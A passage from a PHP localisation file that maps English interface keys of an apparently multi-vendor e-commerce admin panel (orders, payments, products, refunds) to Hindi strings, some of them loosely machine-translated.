नहीं।', 'optional_please_provide_embed_link_not_direct_link' => 'वैकल्पिक कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक नहीं', 'or_continue_with' => 'या के साथ जारी रखें', 'or_some_coupons_are_for_all_sellers' => 'या कुछ कूपन सभी विक्रेताओं के लिए हैं', 'or_you_have_any_other_questions' => 'या आपके पास कोई अन्य प्रश्न हैं', 'order' => 'आदेश', 'order details' => 'ऑर्डर का विवरण', 'order expected deliv...' => 'आदेश अपेक्षित deliv ...', 'order is already delivered' => 'आदेश पहले से ही वितरित किया गया है', 'order payment' => 'आदेश भुगतान', 'order place' => 'आदेश स्थान', 'order refund' => 'आदेश वापसी', 'order status histori...' => 'ऑर्डर स्टेटस हिस्टोरिया ...', 'order transactions' => 'आदेश लेनदेन', 'order wise' => 'आदेश वार', 'order wise seller shipping' => 'आदेश बुद्धिमान विक्रेता शिपिंग', 'order wise shipping' => 'आदेश बुद्धिमान शिपिंग', 'order wise shipping cost' => 'आदेश बुद्धिमान शिपिंग लागत', 'order wise shipping method Status updated successfully' => 'ऑर्डर वार शिपिंग विधि की स्थिति सफलतापूर्वक अपडेट की गई', 'order_&_Shipping_Info' => 'आदेश और शिपिंग जानकारी', 'order_Amount' => 'ऑर्डर करने की राशि', 'order_Canceled' => 'आदेश रद्द किया गया', 'order_Complete' => 'आर्डर पूरा', 'order_Confirmation_Message' => 'आदेश पुष्टिकरण संदेश', 'order_Date' => 'आर्डर की तारीख', 'order_Delivered_Message' => 'आदेश दिया गया संदेश', 'order_Delivery_Verification' => 'आदेश वितरण सत्यापन', 'order_Details' => 'ऑर्डर का विवरण', 'order_Failed_Message' => 'आदेश विफल संदेश', 'order_ID' => 'आदेश कामतत्व', 'order_Invoice' => 'आदेश चालान', 'order_List' => 'आदेश सूची', 'order_No' => 'आदेश संख्या', 'order_Packaging_Message' => 'आदेश पैकेजिंग संदेश', 'order_Pending_Message' => 'आदेश लंबित संदेश', 'order_Placed_Successfully' => 'आदेश सफलतापूर्वक रखा गया', 'order_Report' => 'आदेश रिपोर्ट', 'order_Returned_Message' => 'आदेश वापस संदेश', 'order_Settings' => 'आदेश सेटिंग्स', 'order_Shipped' => 'ऑर्डर भेज दिया', 'order_Statistics' => 'आदेश आँकड़े', 'order_Status' => 'आदेश की स्थिति', 'order_Table' => 'आदेश तालिका', 'order_Transaction_Statement' => 'आदेश लेनदेन विवरण', 'order_Transactions' => 'आदेश लेनदेन', 'order_Type' => 'आदेश प्रकार', 'order_Verification' => 'आदेश सत्यापन', 'order_again' => 'फिर से आदेश देना', 'order_amount' => 'ऑर्डर करने की राशि', 'order_can_be_canceled_only_when_pending.' => 'लंबित होने पर ही ऑर्डर रद्द किया जा सकता है।', 'order_canceled' => 'आदेश रद्द किया गया', 'order_canceled_message' => 'आदेश रद्द संदेश', 'order_canceled_successfully' => 'आदेश सफलतापूर्वक रद्द कर दिया गया', 'order_complete' => 'आर्डर पूरा', 'order_created_at' => 'पर बनाया गया आदेश', 'order_date' => 'आर्डर की तारीख', 'order_delivered' => 'आदेश दिया गया', 'order_details' => 'ऑर्डर का विवरण', 'order_details_id' => 'आदेश विवरण आईडी', 'order_failed_!_Sorry_we_can`t_complete_your_order' => 'आदेश विफल! क्षमा करें, हम आपके आदेश को पूरा नहीं कर सकते', 'order_filter_success' => 'आदेश फ़िल्टर सफलता', 'order_hasbeen_cancelled' => 'आदेश हैबीन रद्द कर दिया गया', 'order_id' => 'आदेश कामतत्व', 'order_info' => 'आदेश जानकारी', 'order_invoice' => 'आदेश चालान', 'order_is_already_delivered.' => 'आदेश पहले से ही वितरित किया गया है।', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'आदेश पहले से ही वितरित किया गया है और लेनदेन राशि को बदल दिया गया है बदलती स्थिति मिसकैरेज का कारण हो सकती है', 'order_is_already_delivered_you_can_not_change_it' => 'ऑर्डर पहले से ही वितरित है आप इसे नहीं बदल सकते हैं', 'order_is_on_the_way' => 'आदेश रास्ते में है', 'order_list' => 'आदेश सूची', 'order_management' => 'प्रबंधन को आदेश दें', 'order_no' => 'आदेश संख्या', 'order_note' => 'आदेश नोट', 'order_out_for_delivery_Message' => 'वितरण संदेश के लिए आदेश दें', 'order_place' => 'आदेश स्थान', 'order_placed' => 'आदेश रखा', 'order_placed_successfully' => 'आदेश सफलतापूर्वक रखा गया', 'order_refund' => 'आदेश वापसी', 'order_refunded_message' => 'आदेश वापस किए गए संदेश', 'order_returned._Product_Successfully_Returned' => 'आदेश वापस आ गया। उत्पाद सफलतापूर्वक वापस आ गया', 'order_settings' => 'आदेश सेटिंग्स', 'order_sort_by_(high_to_low)' => 'आदेश क्रम द्वारा (उच्च से निम्न)', 'order_sort_by_(low_to_high)' => 'आदेश क्रम द्वारा (उच्च से उच्च)', 'order_status' => 'आदेश की स्थिति', 'order_status_returned._Product_Successfully_Returned' => 'आदेश की स्थिति वापस आ गई। उत्पाद सफलतापूर्वक वापस आ गया', 'order_summary' => 'आदेश सारांश', 'order_table' => 'आदेश तालिका', 'order_transactions' => 'आदेश लेनदेन', 'order_type' => 'आदेश प्रकार', 'order_verification' => 'आदेश सत्यापन', 'order_verification_code' => 'आदेश सत्यापन कोड', 'order_wise' => 'आदेश वार', 'order_wise_shipping_method' => 'आदेश बुद्धिमान शिपिंग विधि', 'order_wise_shipping_method_Status_updated_successfully' => 'ऑर्डर वार शिपिंग विधि की स्थिति सफलतापूर्वक अपडेट की गई', 'order_wise_shipping_method_status_updated_successfully' => 'ऑर्डर वार शिपिंग विधि की स्थिति सफलतापूर्वक अपडेट की गई', 'orders' => 'आदेश', 'orders_Served' => 'आदेश दिया', 'other' => 'अन्य', 'other_stores' => 'अन्य भंडार', 'other_wise_these_section_data_would_not_function_properly_in_website_and_user_apps' => 'अन्य बुद्धिमान ये अनुभाग डेटा वेबसाइट और उपयोगकर्ता ऐप्स में ठीक से काम नहीं करेंगे', 'others' => 'अन्य', 'others_store' => 'अन्य स्टोर', 'otp_not_found' => 'ओटीपी नहीं मिला', 'otp_template' => 'ओटीपी टेम्पलेट', 'out_For_Delivery' => 'डिलीवरी के लिए निकले हैं', 'out_for_delivery' => 'डिलीवरी के लिए निकले हैं', 'out_for_delivery_orders' => 'वितरण आदेशों के लिए बाहर', 'out_of_Stock' => 'स्टॉक ख़त्म', 'out_of_stock' => 'स्टॉक ख़त्म', 'out_of_stock!' => 'स्टॉक ख़त्म!', 'overall_Statistics' => 'समग्र आँकड़े', 'overall_statistics' => 'समग्र आँकड़े', 'overview' => 'अवलोकन', 'packaging' => 'पैकेजिंग', 'packaging_order' => 'पैकेजिंग आदेश', 'page_Not_found' => 'पृष्ठ नहीं मिला', 'page_setup' => 'पृष्ठ सेटअप', 'pages' => 'पृष्ठों', 'pagination' => 'पृष्ठ पर अंक लगाना', 'pagination_settings' => 'पेजिनेशन सेटिंग्स', 'paid' => 'चुकाया गया', 'paid_By' => 'द्वारा भुगतान', 'paid_by' => 'द्वारा भुगतान', 'paid_phone_number' => 'सशुल्क फ़ोन नंबर', 'paid_to' => 'को भुगतान किया', 'partner_request' => 'भागीदार अनुरोध', 'passport' => 'पासपोर्ट', 'password' => 'पासवर्ड', 'password Must Be 6 Character' => 'पासवर्ड 6 चरित्र होना चाहिए', 'password_Must_Be_6_Character' => 'पासवर्ड 6 चरित्र होना चाहिए', 'password_does_not_match' => 'पासवर्ड मैच नहीं कर रहा है', 'password_doesn t_Match' => 'पासवर्ड टी मैच नहीं', 'password_doesn t_match' => 'पासवर्ड टी मैच नहीं', 'password_minimum_8_characters' => 'पासवर्ड न्यूनतम 8 वर्ण', 'passwords_do_not_match' => 'सांकेतिक शब्द मेल नहीं खाते', 'passwords_match' => 'पासवर्ड का मेल', 'paste in the input filed below and' => 'नीचे दायर इनपुट में पेस्ट करें और', 'paste_in_the_input_filed_below_and' => 'नीचे दायर इनपुट में पेस्ट करें और', 'paste_script' => 'पेस्ट स्क्रिप्ट', 'pay by wallet' => 'बटुए द्वारा भुगतान करें', 'pay_by_wallet' => 'बटुए द्वारा भुगतान करें', 'pay_with_secure_Digital_payment_gateways' => 'सुरक्षित डिजिटल भुगतान गेटवे के साथ भुगतान करें', 'pay_your_bill_using_any_of_the_payment_method_below_and_input_the_required_information_in_the_form' => 'नीचे दिए गए किसी भी भुगतान विधि का उपयोग करके अपने बिल का भुगतान करें और फॉर्म में आवश्यक जानकारी को इनपुट करें', 'payer_id' => 'अदायगी आईडी', 'payer_info' => 'भुगतानकर्ता जानकारी', 'payer_name' => 'अदाकार का नाम', 'payment' => 'भुगतान', 'paymentUrl' => 'अदायगी', 'payment_By' => 'पेमेंट इसके ज़रिये', 'payment_Info' => 'भुगतान की जानकारी', 'payment_Information' => 'भुगतान जानकारी', 'payment_Method' => 'भुगतान विधि', 'payment_Method_Name' => 'भुगतान विधि नाम', 'payment_Methods' => 'भुगतान की विधि', 'payment_Note' => 'भुगतान नोट', 'payment_Reference' => 'भुगतान संदर्भ', 'payment_Statistics' => 'भुगतान सांख्यिकी', 'payment_Status' => 'भुगतान की स्थिति', 'payment_Url' => 'अदायगी URL', 'payment_by' => 'पेमेंट इसके ज़रिये', 'payment_details' => 'भुगतान विवरण', 'payment_for' => 'के लिए भुगतान', 'payment_gateway_configuration' => 'अदायगी गेटवे कॉन्फ़िगरेशन', 'payment_gateway_title' => 'अदायगी गेटवे शीर्षक', 'payment_info' => 'भुगतान की जानकारी', 'payment_method' => 'भुगतान विधि', 'payment_method_info' => 'भुगतान विधि की जानकारी', 'payment_methods' => 'भुगतान की विधि', 'payment_note' => 'भुगतान नोट', 'payment_option' => 'भुगतान विकल्प', 'payment_receiver_id' => 'भुगतान प्राप्तकर्ता आईडी', 'payment_setup' => 'अदायगी सेटअप', 'payment_status' => 'भुगतान की स्थिति', 'payments' => 'भुगतान', 'payments_Amount' => 'भुगतान राशि', 'paymob_accept' => 'PayMob Accept', 'paymob_supports_EGP_currency' => 'Paymob ईजीपी मुद्रा का समर्थन करता है', 'paypal' => 'Paypal', 'paypal_Secret' => 'पेपैल सीक्रेट', 'paystack' => 'अदायगी', 'paytabs' => 'Paytabs', 'paytabs invoices' => 'अय्यूटी चालान', 'paytm' => 'Paytm', 'paytm_merchant_key' => 'पेटी मर्चेंट कुंजी', 'paytm_merchant_mid' => 'पेटी मिडेंट मिड', 'paytm_merchant_website' => 'Paytm merchant website', 'pc' => 'पीसी', 'pc_' => 'पीसी', 'pending' => 'लंबित', 'pending_Products' => 'लंबित उत्पाद', 'pending_Refund_Requests' => 'लंबित धनवापसी अनुरोध', 'pending_Request' => 'लंबित अनुरोध', 'pending_Withdraw' => 'लंबित निकासी', 'pending_Withdraws' => 'लंबित निकासी', 'pending_amount' => 'बकाया राशि', 'pending_withdraw' => 'लंबित निकासी', 'percent' => 'प्रतिशत', 'percentage' => 'को PERCENTAGE', 'percentage (%)' => 'प्रतिशत (%)', 'percentage_of_loyalty_point_on_order_amount' => 'आदेश राशि पर वफादारी बिंदु का प्रतिशत', 'permanent' => 'स्थायी', 'persentage (%)' => '(%)', 'personal_details' => 'व्यक्तिगत विवरण', 'phone' => 'फ़ोन', 'phone (OTP)' => 'फोन (OTP)', 'phone_name' => 'फ़ोन नाम', 'phone_number' => 'फ़ोन नंबर', 'phone_number_already_has_been_taken' => 'फोन नंबर पहले से ही लिया जा चुका है', 'physical' => 'भौतिक', 'pinterest' => 'Pinterest', 'pixel_analytics_script' => 'पिक्सेल एनालिटिक्स स्क्रिप्ट', 'pixel_analytics_script_from_facebook' => 'फेसबुक से पिक्सेल एनालिटिक्स स्क्रिप्ट', 'pixel_analytics_your_pixel_id' => 'पिक्सेल एनालिटिक्स योर पिक्सेल आईडी', 'pixel_analytics_your_pixel_id_from_facebook' => 'Pixel Analytics फेसबुक से आपका पिक्सेल आईडी', 'place_Holder' => 'स्थान धारक', 'place_Order' => 'आदेश देना', 'placeholder' => 'प्लेसहोल्डर', 'placeholder_text' => 'प्लेसहोल्डर पाठ', 'play_store_download_link' => 'स्टोर डाउनलोड लिंक', 'please' => 'कृपया', 'please input the right ids.' => 'कृपया सही आईडी इनपुट करें।', 'please write the message' => 'कृपया संदेश लिखें', 'please!!' => 'कृपया!!', 'please_ReType_Password' => 'कृपया पासवर्ड रिटाइप करें', 'please_Verify_that_itâs_you.' => 'कृपया सत्यापित करें कि यह आप है।', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for' => 'कृपया याद दिलाएं कि आपको इन अनुभाग के लिए डेटा सेटअप करना होगा', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for_aster_theme.' => 'कृपया याद दिलाएं कि आपको एस्टर थीम के लिए इन अनुभाग के लिए डेटा सेटअप करना होगा।', 'please_check_the_recaptcha' => 'कृपया recaptcha की जाँच करें', 'please_check_your_SMS_for_OTP' => 'कृपया ओटीपी के लिए अपने एसएमएस की जाँच करें', 'please_choose_all_the_options' => 'कृपया सभी विकल्प चुनें', 'please_click_save_information_button_below_to_save_all_the_changes' => 'सभी परिवर्तनों को सहेजने के लिए कृपया नीचे दी गई जानकारी बटन पर क्लिक करें', 'please_click_the_Save_button_below_to_save_all_the_changes' => 'सभी परिवर्तनों को सहेजने के लिए कृपया नीचे दिए गए बटन पर क्लिक करें', 'please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'कृपया अपने बैंक खाते के माध्यम से भुगतान करने के लिए अपने सत्यापित खाते की पुष्टि करें', 'please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'कृपया अपने वेतन की पुष्टि करने और अपना आदेश प्राप्त करने के लिए डिलीवरीमैन के साथ संपर्क करें।', 'please_do_not_forget_to_notify_your_sellers_about_these_changes.' => 'कृपया अपने विक्रेताओं को इन परिवर्तनों के बारे में सूचित करना न भूलें।', 'please_enter_valid_email_address' => 'कृपया सही ईमेल पता दें', 'please_enter_your_email_to_send_a_verification_code_for_forget_password' => 'पासवर्ड भूलने के लिए एक सत्यापन कोड भेजने के लिए कृपया अपना ईमेल दर्ज करें', 'please_enter_your_first_name' => 'कृपया अपना पहला नाम दें', 'please_enter_your_last_name' => 'कृपया अपना अंतिम नाम दर्ज करें', 'please_enter_your_phone_number' => 'कृपया अपना फोन नंबर दर्ज करें', 'please_enter_zip_code' => 'कृपया ज़िप कोड दर्ज करें', 'please_go_back_to_the_homepage' => 'कृपया होमपेज पर वापस जाएं', 'please_make_sure' => 'कृपया सुनिश्चित करें', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'कृपया सुनिश्चित करें कि सभी उत्पाद के वितरण शुल्क अद्यतित हैं।', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date.' => 'कृपया सुनिश्चित करें कि सभी उत्पाद के वितरण शुल्क अद्यतित हैं।', 'please_only_input_png_or_jpg_type_file' => 'कृपया केवल इनपुट PNG या JPG प्रकार फ़ाइल', 'please_provide_coupon_code' => 'कृपया कूपन कोड प्रदान करें', 'please_provide_embed_link_not_direct_link' => 'कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक नहीं', 'please_provide_valid_email' => 'कृपया मान्य ईमेल प्रदान करें', 'please_provide_valid_email_address.' => 'कृपया मान्य ईमेल पता प्रदान करें।', 'please_provide_valid_email_or_phone_number' => 'कृपया मान्य ईमेल या फ़ोन नंबर प्रदान करें', 'please_select_a_payment_Methods' => 'कृपया एक भुगतान विधियों का चयन करें', 'please_try_again_after_' => 'कृपया फिर से प्रयास करें', 'please_type_verify_code' => 'कृपया सत्यापित करें कोड टाइप करें', 'please_verify_that_itâs_you.' => 'कृपया सत्यापित करें कि यह आप है।', 'please_wait_for_new_code.' => 'कृपया नए कोड की प्रतीक्षा करें।', 'please_write_the_message' => 'कृपया संदेश लिखें', 'point' => 'बिंदु', 'point to wallet' => 'बटुए की ओर इशारा करना', 'point_can_earn_by_placing_order_or_referral' => 'पॉइंट ऑर्डर या रेफरल रखकर कमा सकता है', 'point_is_equal_to' => 'बिंदु के बराबर है', 'point_to_wallet' => 'बटुए की ओर इशारा करना', 'point_transaction_history' => 'बिंदु लेनदेन इतिहास', 'points_required_to_convert' => 'परिवर्तित करने के लिए आवश्यक अंक', 'poor' => 'गरीब', 'popular_tags' => 'प्रसिद्ध टग्स', 'popup_Banner' => 'पॉपअप बैनर', 'popup_banner_form' => 'पॉपअप बैनर फार्म', 'port' => 'पत्तन', 'pos' => 'स्थिति', 'pos management' => 'पॉस -प्रबंध', 'pos_management' => 'सशक्त प्रबंधन', 'pos_order' => 'पॉस ऑर्डर', 'pos_orders' => 'पॉस ऑर्डर', 'positive' => 'सकारात्मक', 'positive_review' => 'सकारात्मक समीक्षा', 'post_max_size' => 'अधिकतम आकार पोस्ट करें', 'preparing_Shipment' => 'शिपमेंट तैयार करना', 'press' => 'प्रेस', 'press_Submit' => 'प्रेस सबमिट करें', 'previous' => 'पहले का', 'previous_shipping_cost' => 'पिछला शिपिंग लागत', 'price' => 'कीमत', 'price_comparisons' => 'मूल्य तुलना', 'price_information' => 'मूल्य सूचना', 'price_range' => 'मूल्य सीमा', 'pricing_&_others' => 'मूल्य निर्धारण और अन्य', 'primary_Color' => 'प्राथमिक रंग', 'primary_Light_Color' => 'प्राथमिक प्रकाश रंग', 'print' => 'छाप', 'print_Invoice' => 'चालान छापें', 'print__Invoice' => 'चालान छापें', 'print_invoice' => 'चालान छापें', 'priority' => 'प्राथमिकता', 'privacy_policy' => 'गोपनीयता नीति', 'privateKey' => 'निजी चाबी', 'private_Key' => 'निजी चाबी', 'problem' => 'संकट', 'proceed' => 'आगे बढ़ना', 'proceed_payment' => 'अदायगी', 'proceed_shipping' => 'शिपिंग आगे', 'proceed_to_checkout' => 'चेक आउट करने के लिए आगे बढ़ें', 'proceed_to_next' => 'आगे बढ़ें', 'processed' => 'प्रसंस्कृत', 'processing' => 'प्रसंस्करण', 'processing_order' => 'प्रसंस्करण आदेश', 'product' => 'उत्पाद', 'product 1' => 'उत्पाद 1', 'product 2' => 'उत्पाद 2', 'product 50%' => 'उत्पाद 50%', 'product Name' => 'प्रोडक्ट का नाम', 'product Type' => 'उत्पाद का प्रकार', 'product added successfully' => 'उत्पाद सफलतापूर्वक जोड़ा गया', 'product asdfghjkl ' => 'उत्पाद asdfghjkl', 'product compares' => 'उत्पाद तुलना', 'product management' => 'उत्पाद प्रबंधन', 'product stocks' => 'उत्पाद स्टॉक', 'product tag' => 'उत्पाद टैग', 'product updated successfully!' => 'उत्पाद सफलतापूर्वक अपडेट किया गया!', 'product wise' => 'उत्पाद -वाइज', 'product_Add' => 'उत्पाद जोड़', 'product_Attributes' => 'उत्पाद विशेषताएं', 'product_Bulk_Import' => 'उत्पाद थोक आयात', 'product_Discount' => 'उत्पाद छूट', 'product_Edit' => 'उत्पाद संपादन', 'product_Edit dsf' => 'उत्पाद संपादित करें DSF', 'product_Image' => 'उत्पाद का चित्र', 'product_Info' => 'उत्पाद की जानकारी', 'product_List' => 'उत्पादों की सूची', 'product_Name' => 'प्रोडक्ट का नाम', 'product_Preview' => 'उत्पाद पूर्वावलोकन', 'product_Report' => 'उत्पाद रिपोर्ट', 'product_Reviews' => 'उत्पाद की समीक्षा', 'product_Section' => 'उत्पाद अनुभाग', 'product_Setup' => 'उत्पाद सेटअप', 'product_Statistics' => 'उत्पाद सांख्यिकी', 'product_Stock' => 'उत्पाद स्टॉक', 'product_Table' => 'उत्पाद -तालिका', 'product_Type' => 'उत्पाद का प्रकार', 'product_Unit_Price' => 'उत्पाद एकक मूल्य', 'product_Updated_Requests' => 'उत्पाद अद्यतन अनुरोध', 'product_add' => 'उत्पाद जोड़', 'product_added_successfully' => 'उत्पाद सफलतापूर्वक जोड़ा गया', 'product_already_added_in_cart' => 'कार्ट में पहले से जोड़ा गया उत्पाद', 'product_code_sku' => 'उत्पाद कोड स्कू', 'product_comparison' => 'उत्पाद तुलना', 'product_details' => 'उत्पाद विवरण', 'product_discount' => 'उत्पाद छूट', 'product_dispatched' => 'उत्पाद भेजा गया', 'product_edit' => 'उत्पाद संपादन', 'product_in_wishlist' => 'विशलिस्ट में उत्पाद', 'product_info' => 'उत्पाद की जानकारी', 'product_list' => 'उत्पादों की सूची', 'product_management' => 'उत्पाद प्रबंधन', 'product_must_be_approved' => 'उत्पाद को मंजूरी दी जानी चाहिए', 'product_name' => 'प्रोडक्ट का नाम', 'product_name_not_found' => 'उत्पाद का नाम नहीं मिला', 'product_not_available' => 'उत्पाद उपलब्ध नहीं है', 'product_not_found' => 'उत्पाद नहीं मिला', 'product_of_this_year' => 'इस वर्ष का उत्पाद', 'product_on_delivery' => 'सुपुर्दगी पर उत्पाद', 'product_price_&_stock' => 'उत्पाद मूल्य और स्टाक', 'product_quantity_can_not_be_less_than_0_!' => 'उत्पाद की मात्रा 0 से कम नहीं हो सकती है!', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'उत्पाद की मात्रा शून्य या कार्ट में शून्य से कम नहीं हो सकती है', 'product_quantity_is_not_enough' => 'उत्पाद की मात्रा पर्याप्त नहीं है', 'product_quantity_is_not_enough!' => 'उत्पाद की मात्रा पर्याप्त नहीं है!', 'product_quantity_updated' => 'अद्यतन उत्पाद मात्रा', 'product_quantity_updated_successfully!' => 'उत्पाद की मात्रा सफलतापूर्वक अद्यतन!', 'product_refund_validity' => 'उत्पाद वापसी वैधता', 'product_removed_successfully' => 'उत्पाद को सफलतापूर्वक हटा दिया गया', 'product_report' => 'उत्पाद रिपोर्ट', 'product_review' => 'उत्पाद समीक्षा', 'product_review_not_available' => 'उत्पाद की समीक्षा उपलब्ध नहीं है', 'product_setting' => 'उत्पाद -निर्धारण', 'product_settings' => 'उत्पाद सेटिंग्स', 'product_sku' => 'उत्पाद स्कू', 'product_stock' => 'उत्पाद स्टॉक', 'product_table' => 'उत्पाद -तालिका', 'product_thumbnail' => 'उत्पाद थंबनेल', 'product_type' => 'उत्पाद का प्रकार', 'product_updated_successfully' => 'उत्पाद को सफलतापूर्वक अपडेट किया गया', 'product_variation_setup' => 'उत्पाद भिन्नता सेटअप', 'product_video' => 'उत्पाद वीडियो', 'product_wise' => 'उत्पाद -वाइज', 'product_wise_discounted_amount_will_be_shown_here' => 'उत्पाद वार रियायती राशि यहां दिखाई जाएगी', 'product_wise_shipping_cost' => 'उत्पाद वार शिपिंग लागत', 'product_wise_shipping_cost_approval' => 'उत्पाद वार शिपिंग लागत अनुमोदन', 'products' => 'उत्पादों', 'profile' => 'प्रोफ़ाइल', 'profile_Image' => 'प्रोफ़ाइल छवि', 'profile_Info' => 'प्रोफ़ाइल जानकारी', 'profile_Settings' => 'पार्श्वचित्र समायोजन', 'profile_id' => 'Profile id', 'profile_info' => 'प्रोफ़ाइल जानकारी', 'promo_banner_bottom' => 'प्रोमो बैनर बॉटम', 'promo_banner_left' => 'प्रोमो बैनर छोड़ दिया', 'promo_banner_middle_bottom' => 'प्रोमो बैनर मध्य तल', 'promo_banner_middle_top' => 'प्रोमो बैनर मध्य शीर्ष', 'promo_banner_right' => 'प्रोमो बैनर अधिकार', 'promotion management' => 'पदोन्नति प्रबंधन', 'promotion_management' => 'पदोन्नति प्रबंधन', 'promotional_Banners' => 'प्रचार बैनर', 'provide' => 'उपलब्ध करवाना', 'provide phone number & press' => 'फ़ोन नंबर और प्रेस प्रदान करें', 'provide the' => 'प्रदान करना', 'provide_Primary_Email_and_press' => 'प्राथमिक ईमेल प्रदान करें और दबाएं', 'provide_a_WhatsApp_number_without_country_code' => 'देश कोड के बिना एक व्हाट्सएप नंबर प्रदान करें', 'provide_the' => 'प्रदान करना', 'public' => 'जनता', 'publicKey' => 'सार्वजनिक कुंजी', 'public_Key' => 'सार्वजनिक कुंजी', 'publish' => 'प्रकाशित करना', 'published' => 'प्रकाशित', 'published_key' => 'प्रकाशित कुंजी', 'puma' => 'प्यूमा', 'purchase_code' => 'क्रय कोड', 'purchase_price' => 'खरीद मूल्य', 'purchase_price ($)' => 'खरीद मूल्य ($)', 'purchese_price' => 'क्रय -मूल्य', 'push_Notification' => 'सर्वर पुश नोटीफिकेशन', 'push_Notification_Setup' => 'धक्का अधिसूचना सेटअप', 'push_notification' => 'सर्वर पुश नोटीफिकेशन', 'push_notification_table' => 'पुश अधिसूचना तालिका', 'put_a_description_and_also_identifier_(identifier that used for app)_and_this_is_the' => 'एक विवरण और पहचानकर्ता (पहचानकर्ता जो ऐप के लिए उपयोग किया जाता है) डालें और यह है', 'qty' => 'क्यूटी', 'quantity' => 'मात्रा', 'quantity_sort_by_(high_to_low)' => 'मात्रा क्रम (उच्च से निम्न)', 'quantity_sort_by_(low_to_high)' => 'मात्रा क्रम (उच्च से उच्च)', 'quantity_update' => 'मात्रा अद्यतन', 'quick_links' => 'त्वरित सम्पक', 'quick_view' => 'त्वरित देखें', 'qwert' => 'क्यूवर्ट', 'qwertyu' => 'Qwertyu', 'range' => 'श्रेणी', 'rating' => 'रेटिंग', 'rating_High_to_Low' => 'रेटिंग उच्च से निम्न', 'rating_Low_to_High' => 'रेटिंग कम से उच्च', 'ratings' => 'रेटिंग', 'ratio' => 'अनुपात', 'ratio 1=>1' => 'अनुपात 1=> 1', 'ratio 1=>1 ' => 'अनुपात 1=> 1', 'razor_pay' => 'रेजर वेतन', 're' => 'दोबारा', 'reCAPTCHA Type' => 'Recaptcha प्रकार', 'reCAPTCHA_is_now_enabled_for_added_security.Users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'Recaptcha अब अतिरिक्त सुरक्षा के लिए सक्षम है। यूजर्स को अपनी मानवीय पहचान को सत्यापित करने और स्पैम और दुर्भावनापूर्ण गतिविधि से बचाने के लिए एक Recaptcha चुनौती को पूरा करने के लिए प्रेरित किया जा सकता है', 'reCaptcha' => 'ReCaptcha', 'reCaptcha Setup' => 'ReCaptcha Setup', 'reCaptcha credential Set up Instructions' => 'Recaptcha क्रेडेंशियल सेट अप निर्देश', 'reCaptcha_Setup' => 'ReCaptcha Setup', 'reached_maximum' => 'अधिकतम पहुंच गया', 'read_Before_Change_Theme' => 'चेंज थीम से पहले पढ़ें', 'read_documentation' => 'प्रलेखन पढ़ें', 'read_instructions' => 'निर्देश पढ़ें', 'read_more' => 'और पढ़ें', 'ready_After_Sell' => 'बेचने के बाद तैयार', 'ready_Product' => 'तैयार उत्पाद', 'ready_product_upload' => 'तैयार उत्पाद अपलोड', 'ready_to_Leave' => 'छोड़ने के लिए तैयार', 'recaptcha' => 'Recaptcha', 'received_by' => 'द्वारा प्राप्त', 'receiver_info' => 'रिसीवर की जानकारी', 'recommended' => 'अनुशंसित', 'recommended_for_you' => 'आप के लिए अनुशंसित', 'recommended_product' => 'अनुशंसित उत्पाद', 'recurring' => 'पुनरावर्ती', 'redirecting_to_the_payment' => 'भुगतान के लिए पुनर्निर्देशन', 'refer_&_Earn' => 'देखें और अर्जित करना', 'refer_&_earn' => 'देखें और अर्जित करना', 'refer_code' => 'कोड देखें', 'reference' => 'संदर्भ', 'reference_Code' => 'संदर्भ कोड', 'refund' => 'धनवापसी', 'refund policy' => 'भुगतान वापसी की नीति', 'refund requests' => 'रिफंड अनुरोध', 'refund statuses' => 'वापसी की स्थिति', 'refund transactions' => 'वापसी लेनदेन', 'refund-policy' => 'भुगतान वापसी की नीति', 'refund_Given' => 'दी गई रिफंड', 'refund_Rate' => 'धनवापसी दर', 'refund_Request_List' => 'रिफंड अनुरोध सूची', 'refund_Requests' => 'रिफंड अनुरोध', 'refund_Transactions' => 'वापसी लेनदेन', 'refund_approved' => 'स्वीकृत धनराशि', 'refund_day_limit_updated!!' => 'रिफंड डे लिमिट अपडेट किया गया !!', 'refund_details' => 'वापसी विवरण', 'refund_given' => 'दी गई रिफंड', 'refund_id' => 'वापसी आईडी', 'refund_list' => 'रिफंड सूची', 'refund_management' => 'वापसी प्रबंधन', 'refund_order' => 'वापसी आदेश', 'refund_order_validity' => 'वापसी आदेश वैधता', 'refund_pending' => 'धनराशि लंबित', 'refund_placed_successfully' => 'धनवापसी को सफलतापूर्वक रखा गया', 'refund_policy' => 'भुगतान वापसी की नीति', 'refund_reason' => 'वापसी का कारण', 'refund_refunded' => 'रिफंड रिफंड', 'refund_rejected' => 'अस्वीकार कर दिया गया', 'refund_request' => 'धन वापस करने का अनुरोध', 'refund_request_after_order_within' => 'ऑर्डर के बाद रिफंड अनुरोध', 'refund_request_canceled_message' => 'रिफंड अनुरोध रद्द संदेश', 'refund_request_day_limit' => 'रिफंड अनुरोध दिवस सीमा', 'refund_request_id' => 'रिफंड अनुरोध आईडी', 'refund_request_list' => 'रिफंड अनुरोध सूची', 'refund_request_time_limit' => 'धनवापसी अनुरोध समय सीमा', 'refund_requested_successful!!' => 'धनवापसी का अनुरोध सफल !!', 'refund_requests' => 'रिफंड अनुरोध', 'refund_reson' => 'पुनर्निर्माण', 'refund_settings' => 'वापसी सेटिंग्स', 'refund_setup' => 'रिफंड सेटअप', 'refund_status' => 'वापसी की स्थिति', 'refund_status_change_log' => 'धनवापसी स्थिति परिवर्तन लॉग', 'refund_status_changed_log' => 'धनवापसी स्थिति बदल गई लॉग', 'refund_status_updated!!' => 'धनवापसी स्थिति अद्यतन !!', 'refund_status_updated_successfully!!' => 'वापसी की स्थिति सफलतापूर्वक अपडेट की गई !!', 'refund_to_wallet' => 'बटुए को वापस करना', 'refund_to_wallet_hint' => 'बटुए के संकेत को वापस करना', 'refund_transaction_table' => 'वापसी लेन -देन सारणी', 'refund_transactions' => 'वापसी लेनदेन', 'refunded' => 'वापसी की गई है', 'refunded status can not be changed!!' => 'रिफंड स्टेटस नहीं बदला जा सकता है !!', 'refunded status can not be 